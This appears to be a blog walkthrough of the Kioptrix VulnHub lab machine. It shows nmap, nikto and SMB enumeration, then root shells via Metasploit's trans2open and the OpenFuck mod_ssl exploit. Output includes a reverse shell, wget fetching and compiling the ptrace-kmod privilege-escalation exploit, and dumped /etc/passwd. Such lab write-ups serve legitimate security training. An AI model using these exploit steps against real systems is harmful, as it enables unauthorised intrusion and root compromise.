Kioptrix is a vulnerable machine from VulnHub.
Setup #
Once we have downloaded the files from Vulnhub, we can import the virtual machine into either Virtual Box or VmWare.
The virtual machine should be configured to be on the same sub-net as our attacker.
At this point, I suggest that you stop reading and take a crack at the box yourself if you haven’t already. If you get stuck at any point, use this guide as hint.
Scanning and Enumeration #
Since we are the only other machine on the network in this setup, we can use the network’s broadcast address to send a ping to all machines on the network and the machine which responds will be the victim.
┌──(kali㉿kali)-[~/Documents/Kioptrix]
└─$ ping 10.0.2.255 -b
WARNING: pinging broadcast address
PING 10.0.2.255 (10.0.2.255) 56(84) bytes of data.
64 bytes from 10.0.2.4: icmp_seq=1 ttl=255 time=1.80 ms
64 bytes from 10.0.2.4: icmp_seq=2 ttl=255 time=1.78 ms
64 bytes from 10.0.2.4: icmp_seq=3 ttl=255 time=1.71 ms
64 bytes from 10.0.2.4: icmp_seq=4 ttl=255 time=1.34 ms
64 bytes from 10.0.2.4: icmp_seq=5 ttl=255 time=0.753 ms
64 bytes from 10.0.2.4: icmp_seq=6 ttl=255 time=1.74 ms
64 bytes from 10.0.2.4: icmp_seq=7 ttl=255 time=1.34 ms
From the above, we can clearly see that in my case the client is at 10.0.2.4.
Now that we have the client’s IP address, we can jot this down to our notes and start running scans to see what type of services our clients might be running and on what machine.
Running a NMAP scan gets us a good insight into what is running on the host. For simplicity’s sake some of the lines have been removed or shortened.
┌──(kali㉿kali)-[~/Documents/Kioptrix]
└─$ nmap -sS -A -p- -T4 -oA nmap/scan_report 10.0.2.4
# Nmap 7.94 scan initiated Sat Aug 5 15:57:56 2023 as: nmap -sS -A -p- -T4 -oA nmap/scan_report 10.0.2.4
Nmap scan report for 10.0.2.4
Host is up (0.0011s latency).
Scanned at 2023-08-05 15:58:10 IST for 34s
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 [SHORTENED]
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAA[SHORTENED]
| 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvv8UUWsrO7+VCG/rTWY72jElft[SHORTENED]
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32770/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2023-08-05T19:58:48+00:00; +9h30m04s from scanner time.
| http-methods:
|_ Supported Methods: GET HEAD POST
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-09-26T09:32:06
| Not valid after: 2010-09-26T09:32:06
| MD5: 78ce:5293:4723:e7fe:c28d:74ab:42d7:02f1
| SHA-1: 9c42:91c3:bed2:a95b:983d:10ac:f766:ecb9:8766:1d33
| -----BEGIN CERTIFICATE-----
[REMOVED]
|_-----END CERTIFICATE-----
|_http-title: 400 Bad Request
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open status 1 (RPC #100024)
MAC Address: 00:50:56:3C:7A:ED (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=8/5%OT=22%CT=1%CU=40725%PV=Y%DS=1%DC=D%G=Y%M=005056%TM
OS:=64CE245C%P=x86_64-pc-linux-gnu)SEQ(SP=C1%GCD=1%ISR=CC%TI=Z%CI=Z%II=I%TS
OS:=7)OPS(O1=M5B4ST11NW0%O2=M5B4ST11NW0%O3=M5B4NNT11NW0%O4=M5B4ST11NW0%O5=M
OS:5B4ST11NW0%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16
OS:A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW0%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11N
OS:W0%RD=0%Q=)T4(R=Y%DF=Y%T=FF%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=FF%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=FF%W=0%S=A%A=Z%F=R%O=%RD=0%Q=
OS:)T7(R=Y%DF=Y%T=FF%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=FF%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=FF%CD=S)
Uptime guess: 0.009 days (since Sat Aug 5 15:45:04 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=193 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 10637/tcp): CLEAN (Couldn't connect)
| Check 2 (port 50108/tcp): CLEAN (Couldn't connect)
| Check 3 (port 20871/udp): CLEAN (Failed to receive data)
| Check 4 (port 43005/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KIOPTRIX<00> Flags: <unique><active>
| KIOPTRIX<03> Flags: <unique><active>
| KIOPTRIX<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MYGROUP<00> Flags: <group><active>
| MYGROUP<1d> Flags: <unique><active>
| MYGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_clock-skew: 9h30m03s
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 1.06 ms 10.0.2.4
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 5 15:58:44 2023 -- 1 IP address (1 host up) scanned in 48.35 seconds
I’ve gone ahead and highlighted most of the crucial information. Things like version numbers, ports and the services should be in our notes.
Now that we have an idea of what is running on our machines we can start investigating more closely.
Since we have a HTTP/HTTPS server, we can start a nikto scan along with feroxbuster.
┌──(kali㉿kali)-[~/Documents/Kioptrix]
└─$ nikto -h 10.0.2.4
For feroxbuster we will need to provide a wordlist of directories to search, luckily Kali comes prepared with a wordlists located at usr/share/wordlists/dirbuster/.
┌──(kali㉿kali)-[~/Documents/Kioptrix]
└─$ feroxbuster -u http://10.0.2.4/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Now these scans should take a while, so in the mean time, we can do a little manually ennumeration by checking out the web pages through the browser.
Navigating to the site we can see a default Apache install page. This could potentially lead to some vulnerability due to the default Apache configuration, and should be taken note of.
The NMAP scan also revealed that our host has SMB installed, however it didn’t give us any information on what version. We can make use of Metasploit module to find the SMB version
msf6 auxiliary(scanner/smb/smb_version) > exploit
[*] 10.0.2.4:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 10.0.2.4:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 10.0.2.4: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We can also check if there are any file shares we can access without proper credentials by attempting an annoymous login with smbclient.
-L is used to list the shares.
┌──(kali㉿kali)-[~]
└─$ smbclient -L \\\\10.0.2.4\\\\
Server does not support EXTENDED_SECURITY but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
Anonymous login successful
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
IPC$ IPC IPC Service (Samba Server)
ADMIN$ IPC IPC Service (Samba Server)
Reconnecting with SMB1 for workgroup listing.
Server does not support EXTENDED_SECURITY but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
Anonymous login successful
Server Comment
--------- -------
KIOPTRIX Samba Server
Workgroup Master
--------- -------
MYGROUP KIOPTRIX
So, it looks like there is one share ADMIN$ (we can generally ignore IPC$). Trying to connect to the admin share fails, however it is important to note its existance as there might be something to look at during post exploitation or even during the exploitation stages.
Let’s take a look at the results of our HTTP server scans. Personally the feroxbuster scan didn’t reveal that much due to some bugs, however nikto revealed a lot of information.
$ nikto -h 10.0.2.4
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.0.2.4
+ Target Hostname: 10.0.2.4
+ Target Port: 80
+ Start Time: 2023-08-06 12:00:58 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ /: Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 08:42:46 2001. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Apache is vulnerable to XSS via the Expect header. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918
+ OpenSSL/0.9.6b appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.9.6) (may depend on server version).
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution.
+ Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system.
+ Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0835
+ /manual/: Directory indexing found.
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 19 error(s) and 18 item(s) reported on remote host
+ End Time: 2023-08-06 12:07:50 (GMT5.5) (412 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
This scan reveals quite a few attack vectors.
- The remote buffer overflow leading to a remote shell
- Reading
/etc/shadowand cracking hashes
Now I wanted to have the 2nd option running in the background while I look for other options to gain access. However when I tried to access ///etc/hosts like Nikto did, I got a 404 error.
After a little bit of googling along the lines of nikto ///etc/hosts, I stumbled on this Github issue: https://github.com/sullo/nikto/issues/497.
It seems like since the box returns web pages with 127.0.0.1 at the bottom, nikto assumes this is part of the hosts file and gives us a false positive.
Research #
At this point, it looks like our only option is the remote buffer overflow in mod_ssl (https://www.exploit-db.com/exploits/47080), however we still have to check in on the other oudated services (Apache, Samba).
Looking for vulnerabilities in Apache was pretty lack luster for me, though Samba delivered this: https://www.exploit-db.com/exploits/16861
Now this is wonderful, an exploit from Metasploit.
Exploitation #
We have identified 2 possible remote code execution attack vectors.
Samba Vulnerability #
The exploit we are looking for is /exploit/linux/samba/trans2open. I had some trouble getting a staged payload to work, so I went with the unstaged reverse TCP payload (set payload /payload/...)
msf6 exploit(linux/samba/trans2open) > exploit
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] 10.0.2.4:139 - Trying return address 0xbffffdfc...
[*] 10.0.2.4:139 - Trying return address 0xbffffcfc...
[*] 10.0.2.4:139 - Trying return address 0xbffffbfc...
[*] 10.0.2.4:139 - Trying return address 0xbffffafc...
[*] 10.0.2.4:139 - Trying return address 0xbffff9fc...
[*] 10.0.2.4:139 - Trying return address 0xbffff8fc...
[*] 10.0.2.4:139 - Trying return address 0xbffff7fc...
[*] 10.0.2.4:139 - Trying return address 0xbffff6fc...
[*] Command shell session 1 opened (10.0.2.15:4444 -> 10.0.2.4:32782) at 2023-08-11 10:42:02 -0400
whoami
root
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/dev/null
rpm:x:37:37::/var/lib/rpm:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
squid:x:23:23::/var/spool/squid:/dev/null
pcap:x:77:77::/var/arpwatch:/bin/nologin
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash
mod_ssl #
Unlike the Samba vulnerability, mod_ssl requires a bit more work. We can either download the source code from the exploit database link above, or we can use searchsploit
searchsploit -p 47080
This should return the path to the location of the source code on our system. Once we make a copy in our current directory, we can look inside for a hints on how to get it operational.
/*
* OF version r00t VERY PRIV8 spabam
* Version: v3.0.4
* Requirements: libssl-dev ( apt-get install libssl-dev )
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
* Note: if required, host ptrace and replace wget target
*/
According to the comments, all we need to do is apt install libssl-dev, then compile the source code with gcc -o OpenLuck <filename> -lcrypto.
The installation and compilation goes pretty smoothly. Once that is complete, we can run the binary with no flags or options to get an idea of the syntax.
One of the parameters is the target, its depends on what linux and apache version we have.
Our box has two possible choices:
- “RedHat Linux 7.2 (apache-1.3.20-16)1”: 0x6a
- “RedHat Linux 7.2 (apache-1.3.20-16)2”: 0x6b
Using the first option didn’t seem to work for me so 0x6b it is 😃.
┌──(kali㉿kali)-[~/Documents/Kioptrix]
└─$ ./OpenLuck 0x6b 10.0.2.4 443 -c 46
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 46 of 46
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--14:46:25-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443...
dl.packetstormsecurity.net: Host not found.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$ wget http://10.0.2.15:8000/ptrace-kmod.c
wget http://10.0.2.15:8000/ptrace-kmod.c
--14:48:20-- http://10.0.2.15:8000/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 10.0.2.15:8000... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 1.87 MB/s
14:48:20 (957.28 KB/s) - `ptrace-kmod.c' saved [3921/3921]
bash-2.05$ gcc -o exploit ptrace-kmod.c -B /usr/bin/bash
gcc -o exploit ptrace-kmod.c -B /usr/bin/bash
gcc: file path prefix `/usr/bin/bash' never used
bash-2.05$ ./exploit
./exploit
[+] Attached to 1166
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/dev/null
rpm:x:37:37::/var/lib/rpm:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nolcat /etc/passwd
ogin
radvd:x:75:75:radvd user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
squid:x:23:23::/var/spool/squid:/dev/null
pcap:x:77:77::/var/arpwatch:/bin/nologin
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash
You might have seen that intially I didn’t have root access, the mod_ssl exploit usually gets root access using another ptrace_kmod exploit, however since the host box wasn’t connected to the internet the file couldn’t be downloaded.
This meant I had to host the file on Kali with python (python3 -m http.server) and download the file from the host.
Once downloaded, it was as simple as compiling and running the file to gain root access.
Post Exploitation #
At this point, I haven’t really learn’t much about the post exploitation phase, however an idea I had would be to grab the /etc/shadow file and spend time cracking the hashes so next time we might not have to go through the whole exploitation phase.